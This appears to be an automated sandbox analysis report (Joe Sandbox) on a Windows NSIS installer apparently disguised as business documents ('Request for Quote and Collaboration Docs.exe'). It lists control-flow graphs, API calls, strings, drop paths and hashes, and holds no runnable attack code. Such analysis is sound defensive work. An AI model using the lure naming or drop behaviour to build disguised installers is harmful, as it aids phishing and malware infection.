4103 405c08 lstrcpyW 4102->4103 4104 405c31 4103->4104 4105 405c57 GetShortPathNameW 4103->4105 4128 405b56 GetFileAttributesW CreateFileW 4104->4128 4106 405c6c 4105->4106 4107 405d7e 4105->4107 4106->4107 4109 405c74 wsprintfA 4106->4109 4107->4082 4112 405f0c 18 API calls 4109->4112 4110 405c3b CloseHandle GetShortPathNameW 4110->4107 4111 405c4f 4110->4111 4111->4105 4111->4107 4113 405c9c 4112->4113 4129 405b56 GetFileAttributesW CreateFileW 4113->4129 4115 405ca9 4115->4107 4116 405cb8 GetFileSize GlobalAlloc 4115->4116 4117 405d77 CloseHandle 4116->4117 4118 405cda 4116->4118 4117->4107 4130 405bd9 ReadFile 4118->4130 4123 405cf9 lstrcpyA 4126 405d1b 4123->4126 4124 405d0d 4125 405abb 4 API calls 4124->4125 4125->4126 4127 405d52 SetFilePointer WriteFile GlobalFree 4126->4127 4127->4117 4128->4110 4129->4115 4131 405bf7 4130->4131 4131->4117 4132 405abb lstrlenA 4131->4132 4133 405afc lstrlenA 4132->4133 4134 405b04 4133->4134 4135 405ad5 lstrcmpiA 4133->4135 4134->4123 4134->4124 4135->4134 4136 405af3 CharNextA 4135->4136 4136->4133 5563 402224 5564 40223e 5563->5564 5565 40222b 5563->5565 5566 405f0c 18 API calls 5565->5566 5567 402238 5566->5567 5568 4056c6 MessageBoxIndirectW 5567->5568 5568->5564 5569 10001667 5570 1000152e 4 API calls 5569->5570 5573 1000167f 5570->5573 5571 100016c5 GlobalFree 5572 1000169a 5572->5571 5573->5571 5573->5572 5574 100016b1 VirtualFree 5573->5574 5574->5571 5575 402729 5576 402730 5575->5576 5577 4029c7 5575->5577 5578 402736 FindClose 5576->5578 5578->5577 5579 401cab 5580 402b1d 18 API calls 5579->5580 5581 401cb2 5580->5581 5582 402b1d 18 API calls 5581->5582 5583 401cba GetDlgItem 5582->5583 5584 4024e8 5583->5584 5585 4016af 5586 402b3a 18 API calls 5585->5586 5587 4016b5 GetFullPathNameW 5586->5587 5588 4016f1 5587->5588 5589 4016cf 5587->5589 5590 401706 GetShortPathNameW 5588->5590 5591 4029c7 5588->5591 5589->5588 5592 40622d 2 API calls 5589->5592 5590->5591 5593 4016e1 5592->5593 5593->5588 5595 405eea lstrcpynW 5593->5595 5595->5588 4320 402331 4321 402337 4320->4321 4322 402b3a 18 API calls 4321->4322 4323 402349 4322->4323 4324 402b3a 18 API calls 4323->4324 4325 402353 RegCreateKeyExW 4324->4325 4326 40237d 4325->4326 4328 402793 4325->4328 4327 402398 4326->4327 4329 402b3a 18 API calls 4326->4329 4330 402b1d 18 API calls 4327->4330 4333 4023a4 4327->4333 4332 40238e lstrlenW 4329->4332 4330->4333 4331 4023bf RegSetValueExW 4335 4023d5 RegCloseKey 4331->4335 4332->4327 4333->4331 4337 403062 4333->4337 4335->4328 4338 403072 SetFilePointer 4337->4338 4339 40308e 4337->4339 4338->4339 4352 40317d GetTickCount 4339->4352 4342 405bd9 ReadFile 4343 4030ae 4342->4343 4344 40317d 43 API calls 4343->4344 4348 403139 4343->4348 4345 4030c5 4344->4345 4346 40313f ReadFile 4345->4346 4345->4348 4349 4030d5 4345->4349 4346->4348 4348->4331 4349->4348 4350 405bd9 ReadFile 4349->4350 4351 403108 WriteFile 4349->4351 4350->4349 4351->4348 4351->4349 4353 4032e7 4352->4353 4354 4031ac 4352->4354 4355 402d1a 33 API calls 4353->4355 4365 40330f SetFilePointer 4354->4365 4361 403095 4355->4361 4357 4031b7 SetFilePointer 4363 4031dc 4357->4363 4361->4342 4361->4348 4362 403271 WriteFile 4362->4361 4362->4363 4363->4361 4363->4362 4364 4032c8 SetFilePointer 4363->4364 4366 4032f9 4363->4366 4369 406390 4363->4369 4376 402d1a 4363->4376 4364->4353 4365->4357 4367 405bd9 ReadFile 4366->4367 4368 40330c 4367->4368 4368->4363 4370 4063b5 4369->4370 4371 4063bd 4369->4371 4370->4363 4371->4370 4372 406444 GlobalFree 4371->4372 4373 40644d GlobalAlloc 4371->4373 4374 4064c4 GlobalAlloc 4371->4374 4375 4064bb GlobalFree 4371->4375 4372->4373 4373->4370 4373->4371 4374->4370 4374->4371 4375->4374 4377 402d43 4376->4377 4378 402d2b 4376->4378 4379 402d53 GetTickCount 4377->4379 4380 402d4b 4377->4380 4381 402d34 DestroyWindow 4378->4381 4382 402d3b 4378->4382 4379->4382 4384 402d61 4379->4384 4383 40628d 2 API calls 4380->4383 4381->4382 4382->4363 4383->4382 4385 402d96 CreateDialogParamW ShowWindow 4384->4385 4386 402d69 4384->4386 4385->4382 4386->4382 4391 402cfe 4386->4391 4388 402d77 wsprintfW 4389 405194 25 API calls 4388->4389 4390 402d94 4389->4390 4390->4382 4392 402d0d 4391->4392 4393 402d0f MulDiv 4391->4393 4392->4393 4393->4388 5603 4027b5 5604 402b3a 18 API calls 5603->5604 5605 4027c3 5604->5605 5606 4027d9 5605->5606 5608 402b3a 18 API calls 5605->5608 5607 405b31 2 API calls 5606->5607 5609 4027df 5607->5609 5608->5606 5629 405b56 GetFileAttributesW CreateFileW 5609->5629 5611 4027ec 5612 402895 5611->5612 5613 4027f8 GlobalAlloc 5611->5613 5616 4028b0 5612->5616 5617 40289d DeleteFileW 5612->5617 5614 402811 5613->5614 5615 40288c CloseHandle 5613->5615 5630 40330f SetFilePointer 5614->5630 5615->5612 5617->5616 5619 402817 5620 4032f9 ReadFile 5619->5620 5621 402820 GlobalAlloc 5620->5621 5622 402830 5621->5622 5623 402864 WriteFile GlobalFree 5621->5623 5625 403062 46 API calls 5622->5625 5624 403062 46 API calls 5623->5624 5626 402889 5624->5626 5628 40283d 5625->5628 5626->5615 5627 40285b GlobalFree 5627->5623 5628->5627 5629->5611 5630->5619 5631 4028b6 5632 402b1d 18 API calls 5631->5632 5633 4028bc 5632->5633 5634 4028f8 5633->5634 5635 4028df 5633->5635 5640 402793 5633->5640 5637 402902 5634->5637 5638 40290e 5634->5638 5636 4028e4 5635->5636 5643 4028f5 5635->5643 5645 405eea lstrcpynW 5636->5645 5641 402b1d 18 API calls 5637->5641 5639 405f0c 18 API calls 5638->5639 5639->5643 5641->5643 5643->5640 5646 405e31 wsprintfW 5643->5646 5645->5640 5646->5640 5647 4014b8 5648 4014be 5647->5648 5649 401389 2 API calls 5648->5649 5650 4014c6 5649->5650 4740 4015b9 4741 402b3a 18 API calls 4740->4741 4742 4015c0 4741->4742 4743 4059e0 4 API calls 4742->4743 4754 4015c9 4743->4754 4744 401614 4745 401646 4744->4745 4746 401619 4744->4746 4752 401423 25 API calls 4745->4752 4748 401423 25 API calls 4746->4748 4747 405962 CharNextW 4749 4015d7 CreateDirectoryW 4747->4749 4750 401620 4748->4750 4751 4015ed GetLastError 4749->4751 4749->4754 4758 405eea lstrcpynW 4750->4758 4751->4754 4755 4015fa GetFileAttributesW 4751->4755 4757 40163e 4752->4757 4754->4744 4754->4747 4755->4754 4756 40162d SetCurrentDirectoryW 4756->4757 4758->4756 5651 401939 5652 402b3a 18 API calls 5651->5652 5653 401940 lstrlenW 5652->5653 5654 4024e8 5653->5654 5655 40293b 5656 402b1d 18 API calls 5655->5656 5657 402941 5656->5657 5658 402974 5657->5658 5659 402793 5657->5659 5661 40294f 5657->5661 5658->5659 5660 405f0c 18 API calls 5658->5660 5660->5659 5661->5659 5663 405e31 wsprintfW 5661->5663 5663->5659 4972 40173f 4973 402b3a 18 API calls 4972->4973 4974 401746 4973->4974 4975 405b85 2 API calls 4974->4975 4976 40174d 4975->4976 4977 405b85 2 API calls 4976->4977 4977->4976 5664 40653f 5670 4063c3 5664->5670 5665 406d2e 5666 406444 GlobalFree 5667 40644d GlobalAlloc 5666->5667 5667->5665 5667->5670 5668 4064c4 GlobalAlloc 5668->5665 5668->5670 5669 4064bb GlobalFree 5669->5668 5670->5665 5670->5666 5670->5667 5670->5668 5670->5669

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 40335a-4033f0 #17 SetErrorMode OleInitialize call 406254 SHGetFileInfoW call 405eea GetCommandLineW call 405eea GetModuleHandleW 7 4033f2-4033f9 0->7 8 4033fa-40340c call 405962 CharNextW 0->8 7->8 11 4034da-4034e0 8->11 12 403411-403417 11->12 13 4034e6 11->13 14 403420-403426 12->14 15 403419-40341e 12->15 16 4034fa-403514 GetTempPathW call 403326 13->16 18 403428-40342c 14->18 19 40342d-403431 14->19 15->14 15->15 23 403516-403534 GetWindowsDirectoryW lstrcatW call 403326 16->23 24 40356c-403586 DeleteFileW call 402dbc 16->24 18->19 21 403437-40343d 19->21 22 4034cb-4034d6 call 405962 19->22 26 403457-40346e 21->26 27 40343f-403446 21->27 22->11 39 4034d8-4034d9 22->39 23->24 42 403536-403566 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403326 23->42 44 40361c-40362b call 4037c2 OleUninitialize 24->44 45 40358c-403592 24->45 28 403470-403486 26->28 29 40349c-4034b2 26->29 33 403448-40344b 27->33 34 40344d 27->34 28->29 35 403488-403490 28->35 29->22 37 4034b4-4034c9 29->37 33->26 33->34 34->26 40 403492-403495 35->40 41 403497 35->41 37->22 43 4034e8-4034f5 call 405eea 37->43 39->11 40->29 40->41 41->29 42->24 42->44 43->16 55 403631-403641 call 4056c6 ExitProcess 44->55 56 403727-40372d 44->56 48 403594-40359f call 405962 45->48 49 40360c-403613 call 4038b4 45->49 59 4035a1-4035b2 48->59 60 4035d6-4035e0 48->60 58 403618 49->58 62 4037aa-4037b2 56->62 63 40372f-40374c call 406254 * 3 56->63 58->44 64 4035b4-4035b6 59->64 67 4035e2-4035f0 call 405a3d 60->67 68 403647-403661 lstrcatW lstrcmpiW 60->68 65 4037b4 62->65 66 4037b8-4037bc ExitProcess 62->66 90 403796-4037a1 ExitWindowsEx 63->90 91 40374e-403750 63->91 72 4035d0-4035d4 64->72 73 4035b8-4035ce 64->73 65->66 67->44 81 4035f2-403608 call 405eea * 2 67->81 68->44 75 403663-403679 CreateDirectoryW SetCurrentDirectoryW 68->75 72->60 72->64 73->60 73->72 78 403686-4036af call 405eea 75->78 79 40367b-403681 call 405eea 75->79 89 4036b4-4036d0 call 405f0c DeleteFileW 78->89 79->78 81->49 99 403711-403719 89->99 100 4036d2-4036e2 CopyFileW 89->100 90->62 96 4037a3-4037a5 call 40140b 90->96 91->90 94 403752-403754 91->94 94->90 101 403756-403768 GetCurrentProcess 94->101 96->62 99->89 103 40371b-403722 call 405d84 99->103 100->99 102 4036e4-403704 call 405d84 call 405f0c call 405665 100->102 101->90 108 40376a-40378c 101->108 102->99 115 403706-40370d CloseHandle 102->115 103->44 108->90 115->99
                                                                                          APIs
                                                                                          • #17.COMCTL32 ref: 00403379
                                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 00403384
                                                                                          • OleInitialize.OLE32(00000000), ref: 0040338B
                                                                                            • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                            • Part of subcall function 00406254: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                            • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                          • SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B3
                                                                                            • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                                          • GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C8
                                                                                          • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe",00000000), ref: 004033DB
                                                                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe",00000020), ref: 00403402
                                                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040350B
                                                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040351C
                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403528
                                                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040353C
                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403544
                                                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403555
                                                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040355D
                                                                                          • DeleteFileW.KERNELBASE(1033), ref: 00403571
                                                                                          • OleUninitialize.OLE32(?), ref: 00403621
                                                                                          • ExitProcess.KERNEL32 ref: 00403641
                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe",00000000,?), ref: 0040364D
                                                                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe",00000000,?), ref: 00403659
                                                                                          • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403665
                                                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040366C
                                                                                          • DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C6
                                                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe,0041FE90,00000001), ref: 004036DA
                                                                                          • CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403707
                                                                                          • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375D
                                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403799
                                                                                          • ExitProcess.KERNEL32 ref: 004037BC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                          • String ID: "C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Grope$C:\Users\user\Desktop$C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                          • API String ID: 4107622049-2612260352
                                                                                          • Opcode ID: 19452a82f84b89d672e287bbd9b4a7210e15b48e73439f139737dd6fa92c6ca7
                                                                                          • Instruction ID: adac61535fb2ab45c93a94ea6b46826cba801cc8f349b6914fd9ce0ca4797ca8
                                                                                          • Opcode Fuzzy Hash: 19452a82f84b89d672e287bbd9b4a7210e15b48e73439f139737dd6fa92c6ca7
                                                                                          • Instruction Fuzzy Hash: 72B1C170904211AAD720BF619D49A3B3EACEB4570AF40453FF542BA2E2D77C9941CB7E

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 116 404b10-404b5c GetDlgItem * 2 117 404b62-404bf6 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 116->117 118 404d7d-404d84 116->118 119 404c05-404c0c DeleteObject 117->119 120 404bf8-404c03 SendMessageW 117->120 121 404d86-404d96 118->121 122 404d98 118->122 124 404c0e-404c16 119->124 120->119 123 404d9b-404da4 121->123 122->123 125 404da6-404da9 123->125 126 404daf-404db5 123->126 127 404c18-404c1b 124->127 128 404c3f-404c43 124->128 125->126 129 404e93-404e9a 125->129 132 404dc4-404dcb 126->132 133 404db7-404dbe 126->133 130 404c20-404c3d call 405f0c SendMessageW * 2 127->130 131 404c1d 127->131 128->124 134 404c45-404c71 call 40412f * 2 128->134 135 404f0b-404f13 129->135 136 404e9c-404ea2 129->136 130->128 131->130 138 404e40-404e43 132->138 139 404dcd-404dd0 132->139 133->129 133->132 167 404c77-404c7d 134->167 168 404d3c-404d4f GetWindowLongW SetWindowLongW 134->168 144 404f15-404f1b SendMessageW 135->144 145 404f1d-404f24 135->145 141 4050f3-405105 call 404196 136->141 142 404ea8-404eb2 136->142 138->129 143 404e45-404e4f 138->143 147 404dd2-404dd9 139->147 148 404ddb-404df0 call 404a5e 139->148 142->141 150 404eb8-404ec7 SendMessageW 142->150 152 404e51-404e5d SendMessageW 143->152 153 404e5f-404e69 143->153 144->145 154 404f26-404f2d 145->154 155 404f58-404f5f 145->155 147->138 147->148 148->138 177 404df2-404e03 148->177 150->141 161 404ecd-404ede SendMessageW 150->161 152->153 153->129 163 404e6b-404e75 153->163 164 404f36-404f3d 154->164 165 404f2f-404f30 ImageList_Destroy 154->165 159 4050b5-4050bc 155->159 160 404f65-404f71 call 4011ef 155->160 159->141 172 4050be-4050c5 159->172 188 404f81-404f84 160->188 189 404f73-404f76 160->189 170 404ee0-404ee6 161->170 171 404ee8-404eea 161->171 173 404e86-404e90 163->173 174 404e77-404e84 163->174 175 404f46-404f52 164->175 176 404f3f-404f40 GlobalFree 164->176 165->164 179 404c80-404c87 167->179 183 404d55-404d59 168->183 170->171 181 404eeb-404f04 call 401299 SendMessageW 170->181 171->181 172->141 182 4050c7-4050f1 ShowWindow GetDlgItem ShowWindow 172->182 173->129 174->129 175->155 176->175 177->138 178 404e05-404e07 177->178 184 404e09-404e10 178->184 185 404e1a 178->185 186 404d1d-404d30 179->186 187 404c8d-404cb5 179->187 181->135 182->141 191 404d73-404d7b call 404164 183->191 192 404d5b-404d6e ShowWindow call 404164 183->192 194 404e12-404e14 184->194 195 404e16-404e18 184->195 198 404e1d-404e39 call 40117d 185->198 186->179 202 404d36-404d3a 186->202 196 404cb7-404ced SendMessageW 187->196 197 404cef-404cf1 187->197 203 404fc5-404fe9 call 4011ef 188->203 204 404f86-404f9f call 4012e2 call 401299 188->204 199 404f78 189->199 200 404f79-404f7c call 404ade 189->200 191->118 192->141 194->198 195->198 196->186 206 404cf3-404d02 SendMessageW 197->206 207 404d04-404d1a SendMessageW 197->207 198->138 199->200 200->188 202->168 202->183 218 40508b-40509f InvalidateRect 203->218 219 404fef 203->219 224 404fa1-404fa7 204->224 225 404faf-404fbe SendMessageW 204->225 206->186 207->186 218->159 220 4050a1-4050b0 call 404a31 call 404978 218->220 221 404ff2-404ffd 219->221 220->159 226 405073-405085 221->226 227 404fff-40500e 221->227 228 404fa9 224->228 229 404faa-404fad 224->229 225->203 226->218 226->221 231 405010-40501d 227->231 232 405021-405024 227->232 228->229 229->224 229->225 231->232 234 405026-405029 232->234 235 40502b-405034 232->235 236 405039-405071 SendMessageW * 2 234->236 235->236 237 405036 235->237 236->226 237->236
                                                                                          APIs
                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404B28
                                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404B33
                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7D
                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404B90
                                                                                          • SetWindowLongW.USER32(?,000000FC,00405108), ref: 00404BA9
                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBD
                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCF
                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE5
                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BF1
                                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C03
                                                                                          • DeleteObject.GDI32(00000000), ref: 00404C06
                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C31
                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3D
                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD3
                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFE
                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D12
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404D41
                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4F
                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404D60
                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5D
                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC2
                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED7
                                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EFB
                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F1B
                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404F30
                                                                                          • GlobalFree.KERNEL32(?), ref: 00404F40
                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB9
                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00405062
                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405071
                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00405091
                                                                                          • ShowWindow.USER32(?,00000000), ref: 004050DF
                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 004050EA
                                                                                          • ShowWindow.USER32(00000000), ref: 004050F1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                          • String ID: $M$N
                                                                                          • API String ID: 1638840714-813528018
                                                                                          • Opcode ID: db08064a331c8b710d2bfbefb5f5365b1a6743964771edbed48d05eba51cbb05
                                                                                          • Instruction ID: d71a5cbf05b966a5fca8a5aa47d1df2e6c399d67ef135bcf6f64f468dd7cdb7f
                                                                                          • Opcode Fuzzy Hash: db08064a331c8b710d2bfbefb5f5365b1a6743964771edbed48d05eba51cbb05
                                                                                          • Instruction Fuzzy Hash: 6E027FB0900209EFEB209F54DD85AAE7BB5FB84314F10857AF610BA2E0D7799D52CF58

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 483 405f0c-405f17 484 405f19-405f28 483->484 485 405f2a-405f40 483->485 484->485 486 405f46-405f53 485->486 487 406158-40615e 485->487 486->487 488 405f59-405f60 486->488 489 406164-40616f 487->489 490 405f65-405f72 487->490 488->487 492 406171-406175 call 405eea 489->492 493 40617a-40617b 489->493 490->489 491 405f78-405f84 490->491 494 406145 491->494 495 405f8a-405fc6 491->495 492->493 497 406153-406156 494->497 498 406147-406151 494->498 499 4060e6-4060ea 495->499 500 405fcc-405fd7 GetVersion 495->500 497->487 498->487 503 4060ec-4060f0 499->503 504 40611f-406123 499->504 501 405ff1 500->501 502 405fd9-405fdd 500->502 510 405ff8-405fff 501->510 502->501 507 405fdf-405fe3 502->507 508 406100-40610d call 405eea 503->508 509 4060f2-4060fe call 405e31 503->509 505 406132-406143 lstrlenW 504->505 506 406125-40612d call 405f0c 504->506 505->487 506->505 507->501 515 405fe5-405fe9 507->515 519 406112-40611b 508->519 509->519 511 406001-406003 510->511 512 406004-406006 510->512 511->512 517 406042-406045 512->517 518 406008-40602e call 405db7 512->518 515->501 520 405feb-405fef 515->520 524 406055-406058 517->524 525 406047-406053 GetSystemDirectoryW 517->525 531 406034-40603d call 405f0c 518->531 532 4060cd-4060d1 518->532 519->505 523 40611d 519->523 520->510 527 4060de-4060e4 call 40617e 523->527 529 4060c3-4060c5 524->529 530 40605a-406068 GetWindowsDirectoryW 524->530 528 4060c7-4060cb 525->528 527->505 528->527 528->532 529->528 533 40606a-406074 529->533 530->529 531->528 532->527 536 4060d3-4060d9 lstrcatW 532->536 538 406076-406079 533->538 539 40608e-4060a4 SHGetSpecialFolderLocation 533->539 536->527 538->539 543 40607b-406082 538->543 540 4060a6-4060bd SHGetPathFromIDListW CoTaskMemFree 539->540 541 4060bf 539->541 540->528 540->541 541->529 544 40608a-40608c 543->544 544->528 544->539
                                                                                          APIs
                                                                                          • GetVersion.KERNEL32(00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00405FCF
                                                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040604D
                                                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 00406060
                                                                                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609C
                                                                                          • SHGetPathFromIDListW.SHELL32(?,Call), ref: 004060AA
                                                                                          • CoTaskMemFree.OLE32(?), ref: 004060B5
                                                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D9
                                                                                          • lstrlenW.KERNEL32(Call,00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00406133
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
